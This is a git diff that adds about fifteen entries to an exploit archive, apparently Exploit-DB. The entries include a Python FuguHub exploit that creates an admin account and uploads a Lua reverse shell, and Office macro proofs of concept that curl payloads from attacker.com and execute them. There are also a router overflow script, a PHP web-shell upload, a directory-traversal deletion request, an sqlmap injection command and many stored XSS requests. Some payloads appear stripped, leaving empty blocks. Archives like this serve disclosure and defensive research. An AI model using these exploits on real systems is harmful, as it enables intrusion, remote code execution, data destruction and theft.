diff --git a/exploits/hardware/dos/51561.py b/exploits/hardware/dos/51561.py new file mode 100755 index 000000000..5fa565178 --- /dev/null +++ b/exploits/hardware/dos/51561.py @@ -0,0 +1,28 @@ +# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow +# Date: 2023-06-30 +# country: Iran +# Exploit Author: Amirhossein Bahramizadeh +# Category : hardware +# Dork : /userRpm/WanDynamicIpV6CfgRpm +# Tested on: Windows/Linux +# CVE : CVE-2023-36355 + +import requests + +# Replace the IP address with the router's IP +router_ip = '192.168.0.1' + +# Construct the URL with the vulnerable endpoint and parameter +url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart=' + +# Replace the payload with a crafted payload that triggers the buffer overflow +payload = 'A' * 5000 # Example payload, adjust the length as needed + +# Send the GET request with the crafted payload +response = requests.get(url + payload) + +# Check the response status code +if response.status_code == 200: + print('Buffer overflow triggered successfully') +else: + print('Buffer overflow not triggered') \ No newline at end of file diff --git a/exploits/hardware/webapps/51556.txt b/exploits/hardware/webapps/51556.txt new file mode 100644 index 000000000..27ea24edd --- /dev/null +++ b/exploits/hardware/webapps/51556.txt @@ -0,0 +1,33 @@ +# Exploit Title: D-Link DAP-1325 - Broken Access Control +# Date: 27-06-2023 +# Exploit Author: ieduardogoncalves +# Contact : twitter.com/0x00dia +# Vendor : www.dlink.com +# Version: Hardware version: A1 +# Firmware version: 1.01 +# Tested on:All Platforms + + +1) Description + +Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication. + + +IN MY CASE, +Tested repeater IP: http://192.168.0.21/ + +Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0 + +2) Proof of Concept + +Step 1: Go to +Repeater Login Page : http://192.168.0.21/ + +Step 2: +Add the payload to URL. + +Payload: +http://{ip}/cgi-bin/ExportSettings.sh + +Payload: +https://github.com/eeduardogoncalves/exploit \ No newline at end of file diff --git a/exploits/java/webapps/51564.txt b/exploits/java/webapps/51564.txt new file mode 100644 index 000000000..18cb43c3b --- /dev/null +++ b/exploits/java/webapps/51564.txt @@ -0,0 +1,40 @@ +# Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS) +# Date: 1/07/2023 +# Exploit Author: tmrswrr +# Vendor Homepage: http://www.opencms.org +# Software Link: https://github.com/alkacon/opencms-core +# Version: v15.0 + + +POC: + +1 ) Login in demo page , go to this url +https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!! +2 ) Click /.galleries/ , after right click any png file , open gallery, write in search button this payload + +3 ) You will be see alert box + +POC: + +1 ) Go to this url , right click any png file, rename title section and write your payload : +https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!! +2 ) You will be see alert box , stored xss + +POC: + +1 ) Go to this url , right click any png file and choose replace , click change file and choose your svg file +after save it + +svg file: + + + + + + + + + +2 ) When click this svg file you will be see alert button \ No newline at end of file diff --git a/exploits/multiple/remote/51552.txt b/exploits/multiple/remote/51552.txt new file mode 100644 index 000000000..89de65ac0 --- /dev/null +++ b/exploits/multiple/remote/51552.txt @@ -0,0 +1,51 @@ +## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE) +## Author: nu11secur1ty +## Date: 04.17.2023 +## Vendor: https://www.microsoft.com/ +## Software: https://www.microsoft.com/en-us/microsoft-365/ +## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/ +## CVE-2023-28285 + + +## Description: +The attack itself is carried out locally by a user with authentication +to the targeted system. An attacker could exploit the vulnerability by +convincing a victim, through social engineering, to download and open +a specially crafted file from a website which could lead to a local +attack on the victim's computer. The attacker can trick the victim to +open a malicious web page by using a malicious `Word` file for +`Office-365 API`. After the user will open the file to read it, from +the API of Office-365, without being asked what it wants to activate, +etc, he will activate the code of the malicious server, which he will +inject himself, from this malicious server. Emedietly after this +click, the attacker can receive very sensitive information! For bank +accounts, logs from some sniff attacks, tracking of all the traffic of +the victim without stopping, and more malicious stuff, it depends on +the scenario and etc. +STATUS: HIGH Vulnerability + +[+]Exploit: +The exploit server must be BROADCASTING at the moment when the victim +hit the button of the exploit! + +[+]PoC: +```cmd +Sub AutoOpen() + Call Shell("cmd.exe /S /c" & "curl -s +http://attacker.com/CVE-2023-28285/PoC.debelui | debelui", +vbNormalFocus) +End Sub +``` + +## FYI: +The PoC has a price and this report will be uploaded with a +description and video of how you can reproduce it only. + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285) + +## Proof and Exploit +[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html) + +## Time spend: +01:30:00 \ No newline at end of file diff --git a/exploits/multiple/remote/51555.txt b/exploits/multiple/remote/51555.txt new file mode 100644 index 000000000..b6a713ed9 --- /dev/null +++ b/exploits/multiple/remote/51555.txt @@ -0,0 +1,40 @@ +## Title:Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE) +## Author: nu11secur1ty +## Date: 06.27.2023 +## Vendor: https://www.microsoft.com/ +## Software: https://www.microsoft.com/en-us/microsoft-365/excel +## Reference: https://portswigger.net/daily-swig/rce +## CVE-2023-33137 + + +## Description: +This exploit is connected with third part exploit server, which waits +for the victim to call him and execute the content from him using the +pipe posting method! This is absolutely a 0-day exploit! This is +absolutely dangerous for the victims, who are infected by him! +When the victim hit the button in the Excel file, it makes a POST +request to the exploit server, and the server is responding back that +way: He creates another hidden malicious file and executed it directly +on the machine of the victim, then everything is disappeared, so +nasty. + +STATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users! + +[+]Exploit: +```vbs +Sub AutoOpen() + Call Shell("cmd.exe /S /c" & "curl -s +https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat +> maloumnici.bat && .\maloumnici.bat", vbNormalFocus) +End Sub + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137) + +## Proof and Exploit: +[href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html) + +## Time spend: +01:27:00 \ No newline at end of file diff --git a/exploits/multiple/webapps/51550.py b/exploits/multiple/webapps/51550.py new file mode 100755 index 000000000..61720c16e --- /dev/null +++ b/exploits/multiple/webapps/51550.py @@ -0,0 +1,136 @@ +# Exploit Title: FuguHub 8.1 - Remote Code Execution +# Date: 6/24/2023 +# Exploit Author: redfire359 +# Vendor Homepage: https://fuguhub.com/ +# Software Link: https://fuguhub.com/download.lsp +# Version: 8.1 +# Tested on: Ubuntu 22.04.1 +# CVE : CVE-2023-24078 + +import requests +from bs4 import BeautifulSoup +import hashlib +from random import randint +from urllib3 import encode_multipart_formdata +from urllib3.exceptions import InsecureRequestWarning +import argparse +from colorama import Fore +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + +#Options for user registration, if no user has been created yet +username = 'admin' +password = 'password' +email = 'admin@admin.com' + +parser = argparse.ArgumentParser() +parser.add_argument("-r","--rhost", help = "Victims ip/url (omit the http://)", required = True) +parser.add_argument("-rp","--rport", help = "http port [Default 80]") +parser.add_argument("-l","--lhost", help = "Your IP", required = True) +parser.add_argument("-p","--lport", help = "Port you have your listener on", required = True) +args = parser.parse_args() + +LHOST = args.lhost +LPORT = args.lport +url = args.rhost +if args.rport != None: + port = args.rport +else: + port = 80 + +def main(): + checkAccount() + +def checkAccount(): + print(f"{Fore.YELLOW}[*]{Fore.WHITE} Checking for admin user...") + s = requests.Session() + + # Go to the set admin page... if page contains "User database already saved" then there are already admin creds and we will try to login with the creds, otherwise we will manually create an account + r = s.get(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp") + soup = BeautifulSoup(r.content, 'html.parser') + search = soup.find('h1') + + if r.status_code == 404: + print(Fore.RED + "[!]" + Fore.WHITE +" Page not found! Check the following: \n\tTaget IP\n\tTarget Port") + exit(0) + + userExists = False + userText = 'User database already saved' + for i in search: + if i.string == userText: + userExists = True + + if userExists: + print(f"{Fore.GREEN}[+]{Fore.WHITE} An admin user does exist..") + login(r,s) + else: + print("{Fore.GREEN}[+]{Fore.WHITE} No admin user exists yet, creating account with {username}:{password}") + createUser(r,s) + login(r,s) + +def createUser(r,s): + data = { email : email , + 'user' : username , + 'password' : password , + 'recoverpassword' : 'on' } + r = s.post(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp", data = data) + print(f"{Fore.GREEN}[+]{Fore.WHITE} User Created!") + +def login(r,s): + print(f"{Fore.GREEN}[+]{Fore.WHITE} Logging in...") + + data = {'ba_username' : username , 'ba_password' : password} + r = s.post(f"https://{url}:443/rtl/protected/wfslinks.lsp", data = data, verify = False ) # switching to https cause its easier to script lolz + + #Veryify login + login_Success_Title = 'Web-File-Server' + soup = BeautifulSoup(r.content, 'html.parser') + search = soup.find('title') + + for i in search: + if i != login_Success_Title: + print(f"{Fore.RED}[!]{Fore.WHITE} Error! We got sent back to the login page...") + exit(0) + print(f"{Fore.GREEN}[+]{Fore.WHITE} Success! Finding a valid file server link...") + + exploit(r,s) + +def exploit(r,s): + #Find the file server, default is fs + r = s.get(f"https://{url}:443/fs/cmsdocs/") + + code = r.status_code + + if code == 404: + print(f"{Fore.RED}[!]{Fore.WHITE} File server not found. ") + exit(0) + + print(f"{Fore.GREEN}[+]{Fore.WHITE} Code: {code}, found valid file server, uploading rev shell") + + #Change the shell if you want to, when tested I've had the best luck with lua rev shell code so thats what I put as default + shell = f'local host, port = "{LHOST}", {LPORT} \nlocal socket = require("socket")\nlocal tcp = socket.tcp() \nlocal io = require("io") tcp:connect(host, port); \n while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' + + + file_content = f''' +

Check ur nc listener on the port you put in

+ + + + + Wrong request method, goodBye! + + ''' + + files = {'file': ('rev.lsp', file_content, 'application/octet-stream')} + r = s.post(f"https://{url}:443/fs/cmsdocs/", files=files) + + if r.text == 'ok' : + print(f"{Fore.GREEN}[+]{Fore.WHITE} Successfully uploaded, calling shell ") + r = s.get(f"https://{url}:443/rev.lsp") + +if __name__=='__main__': + try: + main() + except: + print(f"\n{Fore.YELLOW}[*]{Fore.WHITE} Good bye!\n\n**All Hail w4rf4ther!") \ No newline at end of file diff --git a/exploits/php/webapps/51548.txt b/exploits/php/webapps/51548.txt new file mode 100644 index 000000000..9eb7668ef --- /dev/null +++ b/exploits/php/webapps/51548.txt @@ -0,0 +1,152 @@ +Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS +Version: 3.4.1 +Bugs: Multiple Stored XSS +Technology: PHP +Vendor URL: https://www.rukovoditel.net/ +Software Link: https://www.rukovoditel.net/download.php +Date of found: 24-06-2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== + ###XSS-1### +======================================== +steps: +1. login to account +2. create project (http://localhost/index.php?module=items/items&path=21) +3. add task +4. open task +5. add comment as " " + + +POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 241 +Origin: http://localhost +Connection: close +Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1 +Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments= + +=========================== + ###XSS-2### +=========================== +1.go to admin account +2.go to configration => applicaton +3.Copyright Text set as "" + + +POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769 +Content-Length: 2766 +Origin: http://localhost +Connection: close +Referer: http://localhost/index.php?module=configuration/application +Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="form_session_token" + +ju271AAoy1 +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="CFG[APP_NAME]" + +Rukovoditel +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]" + +ffgsdfgsdfg +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]" + +ruko +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="APP_LOGO"; filename="" +Content-Type: application/octet-stream + + +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="CFG[APP_LOGO]" + + +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="CFG[APP_LOGO_URL]" + + +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="APP_FAVICON"; filename="" +Content-Type: application/octet-stream + + +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="CFG[APP_FAVICON]" + + +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]" + + +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="CFG[APP_LANGUAGE]" + +english.php +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="CFG[APP_SKIN]" + + +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="CFG[APP_TIMEZONE]" + +America/New_York +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]" + +10 +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]" + +m/d/Y +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]" + +m/d/Y H:i +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]" + +2/./* +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]" + +0 +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]" + +0 +-----------------------------12298384558648010343132232769 +Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]" + +0 +-----------------------------12298384558648010343132232769-- \ No newline at end of file diff --git a/exploits/php/webapps/51549.py b/exploits/php/webapps/51549.py new file mode 100755 index 000000000..c0f17e7f6 --- /dev/null +++ b/exploits/php/webapps/51549.py @@ -0,0 +1,28 @@ +# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS) +# Date: 2023-06-23 +# country: Iran +# Exploit Author: Amirhossein Bahramizadeh +# Category : webapps +# Dork : /print.php?nm_member= +# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html +# Tested on: Windows/Linux +# CVE : CVE-2023-36346 + +import requests +import urllib.parse + +# Set the target URL and payload +url = "http://example.com/print.php" +payload = "" + +# Encode the payload for URL inclusion +payload = urllib.parse.quote(payload) + +# Build the request parameters +params = { + "nm_member": payload +} + +# Send the request and print the response +response = requests.get(url, params=params) +print(response.text) \ No newline at end of file diff --git a/exploits/php/webapps/51551.txt b/exploits/php/webapps/51551.txt new file mode 100644 index 000000000..67434bd28 --- /dev/null +++ b/exploits/php/webapps/51551.txt @@ -0,0 +1,55 @@ +# Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE) +# Date: 25-05-2023 +# Exploit Author: yuyudhn +# Vendor Homepage: https://www.codekop.com/ +# Software Link: https://github.com/fauzan1892/pos-kasir-php +# Version: 2.0 +# Tested on: Linux +# CVE: CVE-2023-36348 +# Vulnerability description: The application does not sanitize the filename +parameter when sending data to /fungsi/edit/edit.php?gambar=user. An +attacker can exploit this issue by uploading a PHP file and accessing it, +leading to Remote Code Execution. +# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/ + +# Proof of Concept: +1. Login to POS Codekop dashboard. +2. Go to profile settings. +3. Upload PHP script through Upload Profile Photo. + +Burp Log Example: +``` +POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1 +Host: localhost +Content-Length: 8934 +Cache-Control: max-age=0 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "" +**Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: multipart/form-data; +boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpa +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-User: ?1** +Sec-Fetch-Dest: document +Referer: http://localhost/research/pos-kasir-php/index.php?page=user +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhv +Connection: close + +------WebKitFormBoundarymVBHqH4m6KgKBnpa +Content-Disposition: form-data; name="foto"; filename="asuka-rce.php" +Content-Type: image/jpeg + +ÿØÿà JFIF HHÿþ6 +ÿÛC + +----------------------------- +``` +PHP Web Shell location: +http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php \ No newline at end of file diff --git a/exploits/php/webapps/51553.txt b/exploits/php/webapps/51553.txt new file mode 100644 index 000000000..85b1e1839 --- /dev/null +++ b/exploits/php/webapps/51553.txt @@ -0,0 +1,32 @@ +Exploit Title: WebsiteBaker v2.13.3 - Stored XSS +Application: WebsiteBaker +Version: 2.13.3 +Bugs: Stored XSS +Technology: PHP +Vendor URL: https://websitebaker.org/pages/en/home.php +Software Link: https://wiki.websitebaker.org/doku.php/en/downloads +Date of found: 26.06.2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +steps: + +1. login to account +2. go to media +3. upload svg file + +""" + + + + + + + +""" +4. go to svg file (http://localhost/media/malas.svg) \ No newline at end of file diff --git a/exploits/php/webapps/51554.txt b/exploits/php/webapps/51554.txt new file mode 100644 index 000000000..6ce8e4182 --- /dev/null +++ b/exploits/php/webapps/51554.txt @@ -0,0 +1,30 @@ +Exploit Title: WebsiteBaker v2.13.3 - Directory Traversal +Application: WebsiteBaker +Version: 2.13.3 +Bugs: Directory Traversal +Technology: PHP +Vendor URL: https://websitebaker.org/pages/en/home.php +Software Link: https://wiki.websitebaker.org/doku.php/en/downloads +Date of found: 26.06.2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================= + +arbitary directory deleting + +GET /admin/media/delete.php?dir=/../../../../../..//var/www&id=a838b6ebe8ba43a0 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Referer: http://localhost/admin/media/browse.php?dir=/../../../../../..//var/www +Cookie: PHPSESSID-WB-6e6c39=bvnampsc5ji2drm439ph49143c; klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin \ No newline at end of file diff --git a/exploits/php/webapps/51557.txt b/exploits/php/webapps/51557.txt new file mode 100644 index 000000000..2fdbd4802 --- /dev/null +++ b/exploits/php/webapps/51557.txt @@ -0,0 +1,59 @@ +## Exploit Title: spip v4.1.10 - Spoofing Admin account +## Author: nu11secur1ty +## Date: 06.29.2023 +## Vendor: https://www.spip.net/en_rubrique25.html +## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip +## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/ + +## Description: +The malicious user can upload a malicious SVG file which file is not +filtered by a security function, and he can trick +the administrator of this system to check his logo by clicking on him +and visiting, maybe a very dangerous URL. +Wrong web app website logic, and not well sanitizing upload function. + +STATUS: HIGH- Vulnerability + +[+]Exploit: +```SVG + + + + + + + + + + + + + Please click on the logo, to +see our design services, on our website, thank you! + + + + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10) + +## Proof and Exploit: +[href](https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html) + +## Time spend: +00:37:00 \ No newline at end of file diff --git a/exploits/php/webapps/51558.txt b/exploits/php/webapps/51558.txt new file mode 100644 index 000000000..478cbbe4c --- /dev/null +++ b/exploits/php/webapps/51558.txt @@ -0,0 +1,57 @@ +# Exploit Title: Time Slot Booking Calendar 1.8 - Stored XSS +# Date: 29/06/2023 +# Exploit Author: CraCkEr +# Vendor: GZ Scripts +# Vendor Homepage: https://gzscripts.com/ +# Software Link: https://gzscripts.com/time-slot-booking-calendar-php.html +# Version: 1.8 +# Tested on: Windows 10 Pro +# Impact: Manipulate the content of the site + + +## Release Notes: + +Allow Attacker to inject malicious code into website, give ability to steal sensitive +information, manipulate data, and launch additional attacks. + + + +## Stored XSS + +----------------------------------------------- +POST /TimeSlotBookingCalendarPHP/load.php?controller=GzFront&action=booking_details&cid=1 HTTP/1.1 + +promo_code=&title=prof&male=female&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=rtznqs&terms=1&cal_id=1&calendar_id=1 +----------------------------------------------- + +POST parameter 'first_name' is vulnerable to XSS +POST parameter 'second_name' is vulnerable to XSS +POST parameter 'phone' is vulnerable to XSS +POST parameter 'address_1' is vulnerable to XSS +POST parameter 'country' is vulnerable to XSS + + +## Steps to Reproduce: + +1. As a [Guest User] Choose any Day Colored by Green on the Calendar - Click on [+] near Start/End Time - Press [Booking] +2. Inject your [XSS Payload] in "First Name" +3. Inject your [XSS Payload] in "Last Name" +4. Inject your [XSS Payload] in "Phone" +5. Inject your [XSS Payload] in "Address Line 1" +6. Inject your [XSS Payload] in "Country" + + +7. Accept with terms & Press [Booking] + XSS Fired on Local User Browser + +8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard) + XSS Will Fire and Executed on his Browser + +9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index) + XSS Will Fire and Executed on his Browser + +10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index) + XSS Will Fire and Executed on his Browser + + +[-] Done \ No newline at end of file diff --git a/exploits/php/webapps/51559.txt b/exploits/php/webapps/51559.txt new file mode 100644 index 000000000..0ea990109 --- /dev/null +++ b/exploits/php/webapps/51559.txt @@ -0,0 +1,73 @@ +# Exploit Title: GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS) +# Date: 30/06/2023 +# Exploit Author: CraCkEr +# Vendor: GZ Scripts +# Vendor Homepage: https://gzscripts.com/ +# Software Link: https://gzscripts.com/gz-forum-script.html +# Version: 1.8 +# Tested on: Windows 10 Pro +# Impact: Manipulate the content of the site + +## Release Notes: + +Reflected XSS: + +The attacker can send to victim a link containing a malicious URL in an email or +instant message can perform a wide variety of actions, such as stealing the victim's +session token or login credentials + +Stored XSS +Allow Attacker to inject malicious code into website, give ability to steal sensitive +information, manipulate data, and launch additional attacks. + +## Reflected XSS +Path: /preview.php + +GET 'catid' parameter is vulnerable to RXSS + +http://www.website/preview.php?controller=Load&action=index&catid=moztj%22%3e%3cscript%3ealert(1)%3c%2fscript%3ems3ea&down_up=a + + +Path: /preview.php + +GET 'topicid' parameter is vulnerable to RXSS + +http://www.website/preview.php?controller=Load&action=topic&topicid=1wgaff%22%3e%3cscript%3ealert(1)%3c%2fscript%3exdhk2 + +## Stored XSS +----------------------------------------------- +POST /GZForumScript/preview.php?controller=Load&action=start_new_topic HTTP/1.1 + +-----------------------------39829578812616571248381709325 +Content-Disposition: form-data; name="free_name" + + +-----------------------------39829578812616571248381709325 +Content-Disposition: form-data; name="topic" + + +-----------------------------39829578812616571248381709325 +Content-Disposition: form-data; name="topic_message" + + +-----------------------------39829578812616571248381709325-- + +----------------------------------------------- + +POST parameter 'free_name' is vulnerable to XSS +POST parameter 'topic' is vulnerable to XSS +POST parameter 'topic_message' is vulnerable to XSS + + +## Steps to Reproduce: + +1. As a [Guest User] Click on [New Topic] to create a "New Topic" on this Path (http://website/preview.php?controller=Load&action=start_new_topic) +2. Inject your [XSS Payload] in "Name" +3. Inject your [XSS Payload] in "Topic Title " +4. Inject your [XSS Payload] in "Topic Message" +5. Submit + +4. XSS Fired on Visitor Browser's when they Visit the Topic you Infect your [XSS Payload] on + +5. XSS Fired on ADMIN Browser when he visit [Dashboard] in Administration Panel on this Path (https://website/GzAdmin/dashboard) +6. XSS Fired on ADMIN Browser when he visit [Topic] & [All Topics] to check [New Topics] on this Path (https://website/GzTopic/index) \ No newline at end of file diff --git a/exploits/php/webapps/51560.txt b/exploits/php/webapps/51560.txt new file mode 100644 index 000000000..4383c9ba0 --- /dev/null +++ b/exploits/php/webapps/51560.txt @@ -0,0 +1,24 @@ +# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi +# Date: 30/06/2023 +# Exploit Author: Matin nouriyan (matitanium) +# Version: <= 1.0.4 +# CVE: CVE-2022-4297 +Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/ +# Tested on: Kali linux + +--------------------------------------- + + +The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise +and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users, +leading to an unauthenticated SQL injection + +-------------------------------------- + +How to Reproduce this Vulnerability: + +1. Install WP AutoComplete <= 1.0.4 +2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests +3. Find requests belong to WP AutoComplete like step 5 +4. Start sqlmap and exploit +5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000×tamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q \ No newline at end of file diff --git a/exploits/php/webapps/51562.txt b/exploits/php/webapps/51562.txt new file mode 100644 index 000000000..ae9e979a2 --- /dev/null +++ b/exploits/php/webapps/51562.txt @@ -0,0 +1,34 @@ +# Exploit Title: Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS) +# Date: 30/06/2023 +# Exploit Author: CraCkEr +# Vendor: GZ Scripts +# Vendor Homepage: https://gzscripts.com/ +# Software Link: https://gzscripts.com/vacation-rental-website.html +# Version: 1.8 +# Tested on: Windows 10 Pro +# Impact: Manipulate the content of the site + +## Stored XSS + +------------------------------------------------------------ +POST /VacationRentalWebsite/property/8/ad-has-principes/ HTTP/1.1 + +property_id=8&action=detail&send_review=1&cleanliness=0%3B4.2&comfort=0%3B4.2&location=0%3B4.2&service=0%3B4.2&sleep=0%3B4.2&price=0%3B4.2&username=[XSS Payload]&evaluation=3&title=[XSS Payload]&comment=[XSS Payload]&captcha=lbhkyj +------------------------------------------------------------ + +POST parameter 'username' is vulnerable to XSS +POST parameter 'title' is vulnerable to XSS +POST parameter 'comment' is vulnerable to XSS + +## Steps to Reproduce: + +1. Surf (as Guest) - Go to any Listed Property +2. Go to [Customer Reviews] on this Path (http://website/property/[Number1-9]/[name-of-Property]/#customerReviews) +3. Inject your [XSS Payload] in "Username" +4. Inject your [XSS Payload] in "Title" +5. Inject your [XSS Payload] in "Comment" +6. Submit +7. XSS Fired on Local Browser +8. XSS will Fire & Execute on Visitor's Browser when they visit the page of Property you [Inject] the XSS Payloads in & XSS will Fire also on the [Reviews Page] +Note: I think Administration Panel missing a section to Manage [Reviews] on the website +this feature must be added in next Updates [View/Edit/Delete] \ No newline at end of file diff --git a/exploits/php/webapps/51563.txt b/exploits/php/webapps/51563.txt new file mode 100644 index 000000000..af1c7850d --- /dev/null +++ b/exploits/php/webapps/51563.txt @@ -0,0 +1,79 @@ +Exploit Title: Prestashop 8.0.4 - Cross-Site Scripting (XSS) 